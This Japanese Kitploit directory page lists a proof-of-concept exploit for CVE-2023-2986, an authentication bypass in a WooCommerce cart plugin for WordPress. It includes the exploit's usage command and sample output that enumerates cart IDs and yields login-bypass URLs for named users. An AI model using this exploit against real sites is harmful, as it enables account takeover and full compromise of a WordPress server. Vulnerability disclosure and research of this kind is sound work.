Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/ayantaker/cve-2023-2986
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubayantaker/cve-2023-2986

CVE-2023-2986

CVE-2023-2986 の脆弱性に対する Proof of Concept - WordPress の 'Abandoned Cart Lite for WooCommerce' プラグイン

リポジトリを見る
6312年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-2986 のオリジナル Proof of Concept

WordPress プラグイン 'Abandoned Cart Lite for WooCommerce' における脆弱性 CVE-2023-2986 の Proof of Concept

関連詳細

  • NVD Link : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
  • Plugin Source : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
  • 影響を受けるバージョン : version <= 5.14.2 version <= 5.15.1
  • 修正済みバージョン : 5.15.0 5.15.2

更新

バージョン 5.15.0 で問題が修正されたと考えられていましたが、完全には修正されておらず、同様に更新されていることが判明しました。そのため、実際の修正バージョンは 5.15.2 です。

脆弱性分析

  • Keysight Blogs : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
  • Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

使用方法

root@kitploit:~
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
root@kitploit:~
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

URL をブラウザで開くと、該当するユーザーのアカウントにアクセスできます。WordPress 管理者ユーザー自身のエントリがある場合、管理者コンソールへのアクセスが可能になり、WordPress サーバーが完全に侵害されます。

免責事項

この Proof of Concept (PoC) は、純粋に学術研究と効果的な防御技術の開発を目的として作成されたものであり、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。作者は、PoC の誤用について一切の責任を負いません。責任を持って使用してください。

ツールをダウンロード